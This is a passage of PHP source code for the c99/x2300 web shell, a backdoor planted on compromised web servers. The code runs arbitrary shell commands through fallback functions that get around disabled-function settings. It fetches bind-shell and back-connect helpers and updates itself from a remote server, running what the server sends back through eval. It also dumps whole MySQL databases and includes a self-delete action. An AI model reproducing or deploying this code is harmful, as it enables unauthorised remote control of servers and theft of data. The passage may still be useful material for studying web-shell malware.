542. array（"＜b＞[Suicide Script]＜/b＞＜/center＞",$surl.'act＝selfremove'）
543. ）;
544.  
545. //Highlight-code colors
546. $highlight_background ＝ "#c0c0c0";
547. $highlight_bg ＝ "#FFFFFF";
548. $highlight_comment ＝ "#6A6A6A";
549. $highlight_default ＝ "#0000BB";
550. $highlight_html ＝ "#1300FF";
551. $highlight_keyword ＝ "#007700";
552. $highlight_string ＝ "#000000";
553.  
554. @$f ＝ $_REQUEST["f"];
555. @extract（$_REQUEST["c99shcook"]）;
556.  
557. //END CONFIGURATION
558.  
559.  
560. // \/Next code isn't for editing\/
561. /*function ex（$cfe）
562. {
563. $res ＝ '';
564. if （!empty（$cfe））
565. {
566. if（function_exists（'exec'））
567. {
568. @exec（$cfe,$res）;
569. $res ＝ join（"\n",$res）;
570. }
571. elseif（function_exists（'shell_exec'））
572. {
573. $res ＝ @shell_exec（$cfe）;
574. }
575. elseif（function_exists（'system'））
576. {
577. @ob_start（）;
578. @system（$cfe）;
579. $res ＝ @ob_get_contents（）;
580. @ob_end_clean（）;
581. }
582. elseif（function_exists（'passthru'））
583. {
584. @ob_start（）;
585. @passthru（$cfe）;
586. $res ＝ @ob_get_contents（）;
587. @ob_end_clean（）;
588. }
589. elseif（@is_resource（$f ＝ @popen（$cfe,"r"）））
590. {
591. $res ＝ "";
592. while（!@feof（$f）） { $res .＝ @fread（$f,1024）; }
593. @pclose（$f）;
594. }
595. }
596. return $res;
597. }*/
598. /*function which（$pr）
599. {
600. $path ＝ ex（"which $pr"）;
601. if（!empty（$path）） { return $path; } else { return $pr; }
602. }
603.  
604. function cf（$fname,$text）
605. {
606. $w_file＝@fopen（$fname,"w"） or err（0）;
607. if（$w_file）
608. {
609. @fputs（$w_file,@base64_decode（$text））;
610. @fclose（$w_file）;
611. }
612. }*/
613. /*function err（$n,$txt＝''）
614. {
615. echo '＜table width＝100% cellpadding＝0 cellspacing＝0＞＜tr＞＜td bgcolor＝#000000＞＜font color＝red face＝Verdana size＝-2＞＜div align＝center＞＜b＞';
616. echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
617. if（!empty（$txt）） { echo " $txt"; }
618. echo '＜/b＞＜/div＞＜/font＞＜/td＞＜/tr＞＜/table＞';
619. return null;
620. }*/
621. @set_time_limit（0）;
622. $tmp ＝ array（）;
623. foreach（$host_allow as $k＝＞$v） {$tmp[] ＝ str_replace（"\\*",".*",preg_quote（$v））;}
624. $s ＝ "!^（".implode（"|",$tmp）."）$!i";
625. if （!preg_match（$s,getenv（"REMOTE_ADDR"）） and !preg_match（$s,gethostbyaddr（getenv（"REMOTE_ADDR"）））） {exit（"＜a href＝\"http://sniperxcode.com/\"＞x2300 Shell＜/a＞: Access Denied - your host （".getenv（"REMOTE_ADDR"）."） not allow"）;}
626. if （!empty（$login））
627. {
628. if （empty（$md5_pass）） {$md5_pass ＝ md5（$pass）;}
629. if （（$_SERVER["PHP_AUTH_USER"] !＝ $login） or （md5（$_SERVER["PHP_AUTH_PW"]） !＝ $md5_pass））
630. {
631. if （empty（$login_txt）） {$login_txt ＝ strip_tags（ereg_replace（" |＜br＞"," ",$donated_html））;}
632. header（"WWW-Authenticate: Basic realm＝\"c99shell ".$shver.": ".$login_txt."\""）;
633. header（"HTTP/1.0 401 Unauthorized"）;
634. exit（$accessdeniedmess）;
635. }
636. }
637. if （$act !＝ "img"）
638. {
639. $lastdir ＝ realpath（"."）;
640. chdir（$curdir）;
641. if （$selfwrite or $updatenow） {@ob_clean（）; c99sh_getupdate（$selfwrite,1）; exit;}
642. $sess_data ＝ unserialize（$_COOKIE["$sess_cookie"]）;
643. if （!is_array（$sess_data）） {$sess_data ＝ array（）;}
644. if （!is_array（$sess_data["copy"]）） {$sess_data["copy"] ＝ array（）;}
645. if （!is_array（$sess_data["cut"]）） {$sess_data["cut"] ＝ array（）;}
646.  
647. $disablefunc ＝ @ini_get（"disable_functions"）;
648. if （!empty（$disablefunc））
649. {
650. $disablefunc ＝ str_replace（" ","",$disablefunc）;
651. $disablefunc ＝ explode（",",$disablefunc）;
652. }
653.  
654. if （!function_exists（"c99_buff_prepare"））
655. {
656. function c99_buff_prepare（）
657. {
658. global $sess_data;
659. global $act;
660. foreach（$sess_data["copy"] as $k＝＞$v） {$sess_data["copy"][$k] ＝ str_replace（"\\",DIRECTORY_SEPARATOR,realpath（$v））;}
661. foreach（$sess_data["cut"] as $k＝＞$v） {$sess_data["cut"][$k] ＝ str_replace（"\\",DIRECTORY_SEPARATOR,realpath（$v））;}
662. $sess_data["copy"] ＝ array_unique（$sess_data["copy"]）;
663. $sess_data["cut"] ＝ array_unique（$sess_data["cut"]）;
664. sort（$sess_data["copy"]）;
665. sort（$sess_data["cut"]）;
666. if （$act !＝ "copy"） {foreach（$sess_data["cut"] as $k＝＞$v） {if （$sess_data["copy"][$k] ＝＝ $v） {unset（$sess_data["copy"][$k]）; }}}
667. else {foreach（$sess_data["copy"] as $k＝＞$v） {if （$sess_data["cut"][$k] ＝＝ $v） {unset（$sess_data["cut"][$k]）;}}}
668. }
669. }
670. c99_buff_prepare（）;
671.  
672. if （!function_exists（"c99_sess_put"））
673. {
674. function c99_sess_put（$data）
675. {
676. global $sess_cookie;
677. global $sess_data;
678. c99_buff_prepare（）;
679. $sess_data ＝ $data;
680. $data ＝ serialize（$data）;
681. setcookie（$sess_cookie,$data）;
682. }
683. }
684. foreach （array（"sort","sql_sort"） as $v）
685. {
686. if （!empty（$_GET[$v]）） {$$v ＝ $_GET[$v];}
687. if （!empty（$_POST[$v]）） {$$v ＝ $_POST[$v];}
688. }
689. if （$sort_save）
690. {
691. if （!empty（$sort）） {setcookie（"sort",$sort）;}
692. if （!empty（$sql_sort）） {setcookie（"sql_sort",$sql_sort）;}
693. }
694. if （!function_exists（"str2mini"））
695. {
696. function str2mini（$content,$len）
697. {
698. if （strlen（$content） ＞ $len）
699. {
700. $len ＝ ceil（$len/2） - 2;
701. return substr（$content, 0,$len）."...".substr（$content,-$len）;
702. }
703. else {return $content;}
704. }
705. }
706. if （!function_exists（"view_size"））
707. {
708. function view_size（$size）
709. {
710. if （!is_numeric（$size）） {return FALSE;}
711. else
712. {
713. if （$size ＞＝ 1073741824） {$size ＝ round（$size/1073741824*100）/100 ." GB";}
714. elseif （$size ＞＝ 1048576） {$size ＝ round（$size/1048576*100）/100 ." MB";}
715. elseif （$size ＞＝ 1024） {$size ＝ round（$size/1024*100）/100 ." KB";}
716. else {$size ＝ $size . " B";}
717. return $size;
718. }
719. }
720. }
721. if （!function_exists（"fs_copy_dir"））
722. {
723. function fs_copy_dir（$d,$t）
724. {
725. $d ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$d）;
726. if （substr（$d,-1） !＝ DIRECTORY_SEPARATOR） {$d .＝ DIRECTORY_SEPARATOR;}
727. $h ＝ opendir（$d）;
728. while （（$o ＝ readdir（$h）） !＝＝ FALSE）
729. {
730. if （（$o !＝ "."） and （$o !＝ ".."））
731. {
732. if （!is_dir（$d.DIRECTORY_SEPARATOR.$o）） {$ret ＝ copy（$d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o）;}
733. else {$ret ＝ mkdir（$t.DIRECTORY_SEPARATOR.$o）; fs_copy_dir（$d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o）;}
734. if （!$ret） {return $ret;}
735. }
736. }
737. closedir（$h）;
738. return TRUE;
739. }
740. }
741. if （!function_exists（"fs_copy_obj"））
742. {
743. function fs_copy_obj（$d,$t）
744. {
745. $d ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$d）;
746. $t ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$t）;
747. if （!is_dir（dirname（$t））） {mkdir（dirname（$t））;}
748. if （is_dir（$d））
749. {
750. if （substr（$d,-1） !＝ DIRECTORY_SEPARATOR） {$d .＝ DIRECTORY_SEPARATOR;}
751. if （substr（$t,-1） !＝ DIRECTORY_SEPARATOR） {$t .＝ DIRECTORY_SEPARATOR;}
752. return fs_copy_dir（$d,$t）;
753. }
754. elseif （is_file（$d）） {return copy（$d,$t）;}
755. else {return FALSE;}
756. }
757. }
758. if （!function_exists（"fs_move_dir"））
759. {
760. function fs_move_dir（$d,$t）
761. {
762. $h ＝ opendir（$d）;
763. if （!is_dir（$t）） {mkdir（$t）;}
764. while （（$o ＝ readdir（$h）） !＝＝ FALSE）
765. {
766. if （（$o !＝ "."） and （$o !＝ ".."））
767. {
768. $ret ＝ TRUE;
769. if （!is_dir（$d.DIRECTORY_SEPARATOR.$o）） {$ret ＝ copy（$d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o）;}
770. else {if （mkdir（$t.DIRECTORY_SEPARATOR.$o） and fs_copy_dir（$d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o）） {$ret ＝ FALSE;}}
771. if （!$ret） {return $ret;}
772. }
773. }
774. closedir（$h）;
775. return TRUE;
776. }
777. }
778. if （!function_exists（"fs_move_obj"））
779. {
780. function fs_move_obj（$d,$t）
781. {
782. $d ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$d）;
783. $t ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$t）;
784. if （is_dir（$d））
785. {
786. if （substr（$d,-1） !＝ DIRECTORY_SEPARATOR） {$d .＝ DIRECTORY_SEPARATOR;}
787. if （substr（$t,-1） !＝ DIRECTORY_SEPARATOR） {$t .＝ DIRECTORY_SEPARATOR;}
788. return fs_move_dir（$d,$t）;
789. }
790. elseif （is_file（$d））
791. {
792. if（copy（$d,$t）） {return unlink（$d）;}
793. else {unlink（$t）; return FALSE;}
794. }
795. else {return FALSE;}
796. }
797. }
798. if （!function_exists（"fs_rmdir"））
799. {
800. function fs_rmdir（$d）
801. {
802. $h ＝ opendir（$d）;
803. while （（$o ＝ readdir（$h）） !＝＝ FALSE）
804. {
805. if （（$o !＝ "."） and （$o !＝ ".."））
806. {
807. if （!is_dir（$d.$o）） {unlink（$d.$o）;}
808. else {fs_rmdir（$d.$o.DIRECTORY_SEPARATOR）; rmdir（$d.$o）;}
809. }
810. }
811. closedir（$h）;
812. rmdir（$d）;
813. return !is_dir（$d）;
814. }
815. }
816. if （!function_exists（"fs_rmobj"））
817. {
818. function fs_rmobj（$o）
819. {
820. $o ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$o）;
821. if （is_dir（$o））
822. {
823. if （substr（$o,-1） !＝ DIRECTORY_SEPARATOR） {$o .＝ DIRECTORY_SEPARATOR;}
824. return fs_rmdir（$o）;
825. }
826. elseif （is_file（$o）） {return unlink（html_entity_decode（$o））;}
827. else {return FALSE;}
828. }
829. }
830. if （!function_exists（"myshellexec"））
831. {
832. function myshellexec（$cmd）
833. {
834. global $disablefunc;
835. $result ＝ "";
836. if （!empty（$cmd））
837. {
838. if （is_callable（"exec"） and !in_array（"exec",$disablefunc）） {exec（$cmd,$result）; $result ＝ join（"\n",$result）;}
839. elseif （（$result ＝ `$cmd`） !＝＝ FALSE） {}
840. elseif （is_callable（"system"） and !in_array（"system",$disablefunc）） {$v ＝ @ob_get_contents（）; @ob_clean（）; system（$cmd）; $result ＝ @ob_get_contents（）; @ob_clean（）; echo $v;}
841. elseif （is_callable（"passthru"） and !in_array（"passthru",$disablefunc）） {$v ＝ @ob_get_contents（）; @ob_clean（）; passthru（$cmd）; $result ＝ @ob_get_contents（）; @ob_clean（）; echo $v;}
842. elseif （is_resource（$fp ＝ popen（$cmd,"r"）））
843. {
844. $result ＝ "";
845. while（!feof（$fp）） {$result .＝ fread（$fp,1024）;}
846. pclose（$fp）;
847. }
848. }
849. return $result;
850. }
851. }
852. if （!function_exists（'tabsort'）） {function tabsort（$a,$b） {global $v; return strnatcmp（$a[$v], $b[$v]）;}}
853. if （!function_exists（'view_perms'））
854. {
855. function view_perms（$mode）
856. {
857. if （（$mode & 0xC000） ＝＝＝ 0xC000） {$type ＝ "s";}
858. elseif （（$mode & 0x4000） ＝＝＝ 0x4000） {$type ＝ "d";}
859. elseif （（$mode & 0xA000） ＝＝＝ 0xA000） {$type ＝ "l";}
860. elseif （（$mode & 0x8000） ＝＝＝ 0x8000） {$type ＝ "-";}
861. elseif （（$mode & 0x6000） ＝＝＝ 0x6000） {$type ＝ "b";}
862. elseif （（$mode & 0x2000） ＝＝＝ 0x2000） {$type ＝ "c";}
863. elseif （（$mode & 0x1000） ＝＝＝ 0x1000） {$type ＝ "p";}
864. else {$type ＝ "?";}
865.  
866. $owner["read"] ＝ （$mode & 00400）?"r":"-";
867. $owner["write"] ＝ （$mode & 00200）?"w":"-";
868. $owner["execute"] ＝ （$mode & 00100）?"x":"-";
869. $group["read"] ＝ （$mode & 00040）?"r":"-";
870. $group["write"] ＝ （$mode & 00020）?"w":"-";
871. $group["execute"] ＝ （$mode & 00010）?"x":"-";
872. $world["read"] ＝ （$mode & 00004）?"r":"-";
873. $world["write"] ＝ （$mode & 00002）? "w":"-";
874. $world["execute"] ＝ （$mode & 00001）?"x":"-";
875.  
876. if （$mode & 0x800） {$owner["execute"] ＝ （$owner["execute"] ＝＝ "x"）?"s":"S";}
877. if （$mode & 0x400） {$group["execute"] ＝ （$group["execute"] ＝＝ "x"）?"s":"S";}
878. if （$mode & 0x200） {$world["execute"] ＝ （$world["execute"] ＝＝ "x"）?"t":"T";}
879.  
880. return $type.join（"",$owner）.join（"",$group）.join（"",$world）;
881. }
882. }
883. if （!function_exists（"posix_getpwuid"） and !in_array（"posix_getpwuid",$disablefunc）） {function posix_getpwuid（$uid） {return FALSE;}}
884. if （!function_exists（"posix_getgrgid"） and !in_array（"posix_getgrgid",$disablefunc）） {function posix_getgrgid（$gid） {return FALSE;}}
885. if （!function_exists（"posix_kill"） and !in_array（"posix_kill",$disablefunc）） {function posix_kill（$gid） {return FALSE;}}
886. if （!function_exists（"parse_perms"））
887. {
888. function parse_perms（$mode）
889. {
890. if （（$mode & 0xC000） ＝＝＝ 0xC000） {$t ＝ "s";}
891. elseif （（$mode & 0x4000） ＝＝＝ 0x4000） {$t ＝ "d";}
892. elseif （（$mode & 0xA000） ＝＝＝ 0xA000） {$t ＝ "l";}
893. elseif （（$mode & 0x8000） ＝＝＝ 0x8000） {$t ＝ "-";}
894. elseif （（$mode & 0x6000） ＝＝＝ 0x6000） {$t ＝ "b";}
895. elseif （（$mode & 0x2000） ＝＝＝ 0x2000） {$t ＝ "c";}
896. elseif （（$mode & 0x1000） ＝＝＝ 0x1000） {$t ＝ "p";}
897. else {$t ＝ "?";}
898. $o["r"] ＝ （$mode & 00400） ＞ 0; $o["w"] ＝ （$mode & 00200） ＞ 0; $o["x"] ＝ （$mode & 00100） ＞ 0;
899. $g["r"] ＝ （$mode & 00040） ＞ 0; $g["w"] ＝ （$mode & 00020） ＞ 0; $g["x"] ＝ （$mode & 00010） ＞ 0;
900. $w["r"] ＝ （$mode & 00004） ＞ 0; $w["w"] ＝ （$mode & 00002） ＞ 0; $w["x"] ＝ （$mode & 00001） ＞ 0;
901. return array（"t"＝＞$t,"o"＝＞$o,"g"＝＞$g,"w"＝＞$w）;
902. }
903. }
904. if （!function_exists（"parsesort"））
905. {
906. function parsesort（$sort）
907. {
908. $one ＝ intval（$sort）;
909. $second ＝ substr（$sort,-1）;
910. if （$second !＝ "d"） {$second ＝ "a";}
911. return array（$one,$second）;
912. }
913. }
914. if （!function_exists（"view_perms_color"））
915. {
916. function view_perms_color（$o）
917. {
918. if （!is_readable（$o）） {return "＜font color＝red＞".view_perms（fileperms（$o））."＜/font＞";}
919. elseif （!is_writable（$o）） {return "＜font color＝white＞".view_perms（fileperms（$o））."＜/font＞";}
920. else {return "＜font color＝green＞".view_perms（fileperms（$o））."＜/font＞";}
921. }
922. }
923. if （!function_exists（"c99getsource"））
924. {
925. function c99getsource（$fn）
926. {
927. global $c99sh_sourcesurl;
928. $array ＝ array（
929. "c99sh_bindport.pl" ＝＞ "c99sh_bindport_pl.txt",
930. "c99sh_bindport.c" ＝＞ "c99sh_bindport_c.txt",
931. "c99sh_backconn.pl" ＝＞ "c99sh_backconn_pl.txt",
932. "c99sh_backconn.c" ＝＞ "c99sh_backconn_c.txt",
933. "c99sh_datapipe.pl" ＝＞ "c99sh_datapipe_pl.txt",
934. "c99sh_datapipe.c" ＝＞ "c99sh_datapipe_c.txt",
935. ）;
936. $name ＝ $array[$fn];
937. if （$name） {return file_get_contents（$c99sh_sourcesurl.$name）;}
938. else {return FALSE;}
939. }
940. }
941. if （!function_exists（"c99sh_getupdate"））
942. {
943. function c99sh_getupdate（$update ＝ TRUE）
944. {
945. $url ＝ $GLOBALS["c99sh_updateurl"]."?version＝".urlencode（base64_encode（$GLOBALS["shver"]））."&updatenow＝".（$updatenow?"1":"0"）."&";
946. $data ＝ @file_get_contents（$url）;
947. if （!$data） {return "Can't connect to update-server!";}
948. else
949. {
950. $data ＝ ltrim（$data）;
951. $string ＝ substr（$data,3,ord（$data{2}））;
952. if （$data{0} ＝＝ "\x99" and $data{1} ＝＝ "\x01"） {return "Error: ".$string; return FALSE;}
953. if （$data{0} ＝＝ "\x99" and $data{1} ＝＝ "\x02"） {return "You are using latest version!";}
954. if （$data{0} ＝＝ "\x99" and $data{1} ＝＝ "\x03"）
955. {
956. $string ＝ explode（"\x01",$string）;
957. if （$update）
958. {
959. $confvars ＝ array（）;
960. $sourceurl ＝ $string[0];
961. $source ＝ file_get_contents（$sourceurl）;
962. if （!$source） {return "Can't fetch update!";}
963. else
964. {
965. $fp ＝ fopen（__FILE__,"w"）;
966. if （!$fp） {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually ＜a href＝\"".$sourceurl."\"＞＜u＞here＜/u＞＜/a＞.";}
967. else {fwrite（$fp,$source）; fclose（$fp）; return "Thanks! Updated with success.";}
968. }
969. }
970. else {return "New version are available: ".$string[1];}
971. }
972. elseif （$data{0} ＝＝ "\x99" and $data{1} ＝＝ "\x04"） {eval（$string）; return 1;}
973. else {return "Error in protocol: segmentation failed! （".$data."） ";}
974. }
975. }
976. }
977. if （!function_exists（"mysql_dump"））
978. {
979. function mysql_dump（$set）
980. {
981. global $shver;
982. $sock ＝ $set["sock"];
983. $db ＝ $set["db"];
984. $print ＝ $set["print"];
985. $nl2br ＝ $set["nl2br"];
986. $file ＝ $set["file"];
987. $add_drop ＝ $set["add_drop"];
988. $tabs ＝ $set["tabs"];
989. $onlytabs ＝ $set["onlytabs"];
990. $ret ＝ array（）;
991. $ret["err"] ＝ array（）;
992. if （!is_resource（$sock）） {echo（"Error: \$sock is not valid resource."）;}
993. if （empty（$db）） {$db ＝ "db";}
994. if （empty（$print）） {$print ＝ 0;}
995. if （empty（$nl2br）） {$nl2br ＝ 0;}
996. if （empty（$add_drop）） {$add_drop ＝ TRUE;}
997. if （empty（$file））
998. {
999. $file ＝ $tmpdir."dump_".getenv（"SERVER_NAME"）."_".$db."_".date（"d-m-Y-H-i-s"）.".sql";
1000. }
1001. if （!is_array（$tabs）） {$tabs ＝ array（）;}
1002. if （empty（$add_drop）） {$add_drop ＝ TRUE;}
1003. if （sizeof（$tabs） ＝＝ 0）
1004. {
1005. // retrive tables-list
1006. $res ＝ mysql_query（"SHOW TABLES FROM ".$db, $sock）;
1007. if （mysql_num_rows（$res） ＞ 0） {while （$row ＝ mysql_fetch_row（$res）） {$tabs[] ＝ $row[0];}}
1008. }
1009. $out ＝ "# Dumped by Locous7Shell.SQL v. ".$shver."
1010. # Home page: http://www.sniperxcode.com
1011. #
1012. # Host settings:
1013. # MySQL version: （".mysql_get_server_info（）."） running on ".getenv（"SERVER_ADDR"）." （".getenv（"SERVER_NAME"）."）"."
1014. # Date: ".date（"d.m.Y H:i:s"）."
1015. # DB: \"".$db."\"
1016. #---------------------------------------------------------
1017. ";
1018. $c ＝ count（$onlytabs）;
1019. foreach（$tabs as $tab）
1020. {
1021. if （（in_array（$tab,$onlytabs）） or （!$c））
1022. {
1023. if （$add_drop） {$out .＝ "DROP TABLE IF EXISTS `".$tab."`;\n";}
1024. // recieve query for create table structure
1025. $res ＝ mysql_query（"SHOW CREATE TABLE `".$tab."`", $sock）;
1026. if （!$res） {$ret["err"][] ＝ mysql_smarterror（）;}
1027. else
1028. {
1029. $row ＝ mysql_fetch_row（$res）;
1030. $out .＝ $row["1"].";\n\n";
1031. // recieve table variables
1032. $res ＝ mysql_query（"SELECT * FROM `$tab`", $sock）;
1033. if （mysql_num_rows（$res） ＞ 0）
1034. {
1035. while （$row ＝ mysql_fetch_assoc（$res））
1036. {
1037. $keys ＝ implode（"`, `", array_keys（$row））;
1038. $values ＝ array_values（$row）;
1039. foreach（$values as $k＝＞$v） {$values[$k] ＝ addslashes（$v）;}
1040. $values ＝ implode（"', '", $values）;
1041. $sql ＝ "INSERT INTO `$tab`（`".$keys."`） VALUES （'".$values."'）;\n";
1042. $out .＝ $sql;
1043. }
1044. }
1045. }
1046. }
1047. }
1048. $out .＝ "#---------------------------------------------------------------------------------\n\n";
1049. if （$file）
1050. {
1051. $fp ＝ fopen（$file, "w"）;
1052. if （!$fp） {$ret["err"][] ＝ 2;}
1053. else
1054. {
1055. fwrite （$fp, $out）;
1056. fclose （$fp）;
1057. }
1058. }
1059. if （$print） {if （$nl2br） {echo nl2br（$out）;} else {echo $out;}}
1060. return $out;
1061. }
1062. }
1063. if （!function_exists（"mysql_buildwhere"））
1064. {
1065. function mysql_buildwhere（$array,$sep＝" and",$functs＝array（））
1066. {
1067. if （!is_array（$array）） {$array ＝ array（）;}
1068. $result ＝ "";
1069. foreach（$array as $k＝＞$v）
1070. {
1071. $value ＝ "";
1072. if （!empty（$functs[$k]）） {$value .＝ $functs[$k]."（";}
1073. $value .＝ "'".addslashes（$v）."'";
1074. if （!empty（$functs[$k]）） {$value .＝ "）";}
1075. $result .＝ "`".$k."` ＝ ".$value.$sep;
1076. }
1077. $result ＝ substr（$result,0,strlen（$result）-strlen（$sep））;
1078. return $result;
1079. }
1080. }
1081. if （!function_exists（"mysql_fetch_all"））
1082. {
1083. function mysql_fetch_all（$query,$sock）
1084. {
1085. if （$sock） {$result ＝ mysql_query（$query,$sock）;}
1086. else {$result ＝ mysql_query（$query）;}
1087. $array ＝ array（）;
1088. while （$row ＝ mysql_fetch_array（$result）） {$array[] ＝ $row;}
1089. mysql_free_result（$result）;
1090. return $array;
1091. }
1092. }
1093. if （!function_exists（"mysql_smarterror"））
1094. {
1095. function mysql_smarterror（$type,$sock）
1096. {
1097. if （$sock） {$error ＝ mysql_error（$sock）;}
1098. else {$error ＝ mysql_error（）;}
1099. $error ＝ htmlspecialchars（$error）;
1100. return $error;
1101. }
1102. }
1103. if （!function_exists（"mysql_query_form"））
1104. {
1105. function mysql_query_form（）
1106. {
1107. global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
1108. if （（$submit） and （!$sql_query_result） and （$sql_confirm）） {if （!$sql_query_error） {$sql_query_error ＝ "Query was empty";} echo "＜b＞Error:＜/b＞ ＜br＞".$sql_query_error."＜br＞";}
1109. if （$sql_query_result or （!$sql_confirm）） {$sql_act ＝ $sql_goto;}
1110. if （（!$submit） or （$sql_act））
1111. {
1112. echo "＜table border＝0＞＜tr＞＜td＞＜form name＝\"c99sh_sqlquery\" method＝POST＞＜b＞"; if （（$sql_query） and （!$submit）） {echo "Do you really want to";} else {echo "SQL-Query";} echo ":＜/b＞＜br＞＜br＞＜textarea name＝sql_query cols＝100 rows＝10＞".htmlspecialchars（$sql_query）."＜/textarea＞＜br＞＜br＞＜input type＝hidden name＝act value＝sql＞＜input type＝hidden name＝sql_act value＝query＞＜input type＝hidden name＝sql_tbl value＝\"".htmlspecialchars（$sql_tbl）."\"＞＜input type＝hidden name＝submit value＝\"1\"＞＜input type＝hidden name＝\"sql_goto\" value＝\"".htmlspecialchars（$sql_goto）."\"＞＜input type＝submit name＝sql_confirm value＝\"Yes\"＞ ＜input type＝submit value＝\"No\"＞＜/form＞＜/td＞";
1113. if （$tbl_struct）
1114. {
1115. echo "＜td valign＝\"top\"＞＜b＞Fields:＜/b＞＜br＞";
1116. foreach （$tbl_struct as $field） {$name ＝ $field["Field"]; echo "+ ＜a href＝\"#\" onclick＝\"document.c99sh_sqlquery.sql_query.value+＝'`".$name."`';\"＞＜b＞".$name."＜/b＞＜/a＞＜br＞";}
1117. echo "＜/td＞＜/tr＞＜/table＞";
1118. }
1119. }
1120. if （$sql_query_result or （!$sql_confirm）） {$sql_query ＝ $sql_last_query;}
1121. }
1122. }
1123. if （!function_exists（"mysql_create_db"））
1124. {
1125. function mysql_create_db（$db,$sock＝""）
1126. {
1127. $sql ＝ "CREATE DATABASE `".addslashes（$db）."`;";
1128. if （$sock） {return mysql_query（$sql,$sock）;}
1129. else {return mysql_query（$sql）;}
1130. }
1131. }
1132. if （!function_exists（"mysql_query_parse"））
1133. {
1134. function mysql_query_parse（$query）
1135. {
1136. $query ＝ trim（$query）;
1137. $arr ＝ explode （" ",$query）;
1138. /*array array（）
1139. {
1140. "METHOD"＝＞array（output_type）,
1141. "METHOD1"...
1142. ...
1143. }
1144. if output_type ＝＝ 0, no output,
1145. if output_type ＝＝ 1, no output if no error
1146. if output_type ＝＝ 2, output without control-buttons
1147. if output_type ＝＝ 3, output with control-buttons
1148. */
1149. $types ＝ array（
1150. "SELECT"＝＞array（3,1）,
1151. "SHOW"＝＞array（2,1）,
1152. "DELETE"＝＞array（1）,
1153. "DROP"＝＞array（1）
1154. ）;
1155. $result ＝ array（）;
1156. $op ＝ strtoupper（$arr[0]）;
1157. if （is_array（$types[$op]））
1158. {
1159. $result["propertions"] ＝ $types[$op];
1160. $result["query"] ＝ $query;
1161. if （$types[$op] ＝＝ 2）
1162. {
1163. foreach（$arr as $k＝＞$v）
1164. {
1165. if （strtoupper（$v） ＝＝ "LIMIT"）
1166. {
1167. $result["limit"] ＝ $arr[$k+1];
1168. $result["limit"] ＝ explode（",",$result["limit"]）;
1169. if （count（$result["limit"]） ＝＝ 1） {$result["limit"] ＝ array（0,$result["limit"][0]）;}
1170. unset（$arr[$k],$arr[$k+1]）;
1171. }
1172. }
1173. }
1174. }
1175. else {return FALSE;}
1176. }
1177. }
1178. if （!function_exists（"c99fsearch"））
1179. {
1180. function c99fsearch（$d）
1181. {
1182. global $found;
1183. global $found_d;
1184. global $found_f;
1185. global $search_i_f;
1186. global $search_i_d;
1187. global $a;
1188. if （substr（$d,-1） !＝ DIRECTORY_SEPARATOR） {$d .＝ DIRECTORY_SEPARATOR;}
1189. $h ＝ opendir（$d）;
1190. while （（$f ＝ readdir（$h）） !＝＝ FALSE）
1191. {
1192. if（$f !＝ "." && $f !＝ ".."）
1193. {
1194. $bool ＝ （empty（$a["name_regexp"]） and strpos（$f,$a["name"]） !＝＝ FALSE） || （$a["name_regexp"] and ereg（$a["name"],$f））;
1195. if （is_dir（$d.$f））
1196. {
1197. $search_i_d++;
1198. if （empty（$a["text"]） and $bool） {$found[] ＝ $d.$f; $found_d++;}
1199. if （!is_link（$d.$f）） {c99fsearch（$d.$f）;}
1200. }
1201. else
1202. {
1203. $search_i_f++;
1204. if （$bool）
1205. {
1206. if （!empty（$a["text"]））
1207. {
1208. $r ＝ @file_get_contents（$d.$f）;
1209. if （$a["text_wwo"]） {$a["text"] ＝ " ".trim（$a["text"]）." ";}
1210. if （!$a["text_cs"]） {$a["text"] ＝ strtolower（$a["text"]）; $r ＝ strtolower（$r）;}
1211. if （$a["text_regexp"]） {$bool ＝ ereg（$a["text"],$r）;}
1212. else {$bool ＝ strpos（" ".$r,$a["text"],1）;}
1213. if （$a["text_not"]） {$bool ＝ !$bool;}
1214. if （$bool） {$found[] ＝ $d.$f; $found_f++;}
1215. }
1216. else {$found[] ＝ $d.$f; $found_f++;}
1217. }
1218. }
1219. }
1220. }
1221. closedir（$h）;
1222. }
1223. }
1224. if （$act ＝＝ "gofile"） {if （is_dir（$f）） {$act ＝ "ls"; $d ＝ $f;} else {$act ＝ "f"; $d ＝ dirname（$f）; $f ＝ basename（$f）;}}
1225. //Sending headers
1226. @ob_start（）;
1227. @ob_implicit_flush（0）;
1228. function onphpshutdown（）
1229. {
1230. global $gzipencode,$ft;
1231. if （!headers_sent（） and $gzipencode and !in_array（$ft,array（"img","download","notepad"）））
1232. {
1233. $v ＝ @ob_get_contents（）;
1234. @ob_end_clean（）;
1235. @ob_start（"ob_gzHandler"）;
1236. echo $v;
1237. @ob_end_flush（）;
1238. }
1239. }
1240. function c99shexit（）
1241. {
1242. onphpshutdown（）;
1243. exit;
1244. }
1245. header（"Expires: Mon, 26 Jul 1997 05:00:00 GMT"）;
1246. header（"Last-Modified: ".gmdate（"D, d M Y H:i:s"）." GMT"）;
1247. header（"Cache-Control: no-store, no-cache, must-revalidate"）;
1248. header（"Cache-Control: post-check＝0, pre-check＝0", FALSE）;
1249. header（"Pragma: no-cache"）;
1250. if （empty（$tmpdir））
1251. {
1252. $tmpdir ＝ ini_get（"upload_tmp_dir"）;
1253. if （is_dir（$tmpdir）） {$tmpdir ＝ "/tmp/";}
1254. }
1255. $tmpdir ＝ realpath（$tmpdir）;
1256. $tmpdir ＝ str_replace（"\\",DIRECTORY_SEPARATOR,$tmpdir）;
1257. if （substr（$tmpdir,-1） !＝ DIRECTORY_SEPARATOR） {$tmpdir .＝ DIRECTORY_SEPARATOR;}
1258. if （empty（$tmpdir_logs）） {$tmpdir_logs ＝ $tmpdir;}
1259. else {$tmpdir_logs ＝ realpath（$tmpdir_logs）;}
1260. if （@ini_get（"safe_mode"） or strtolower（@ini_get（"safe_mode"）） ＝＝ "on"）
1261. {
1262. $safemode ＝ TRUE;
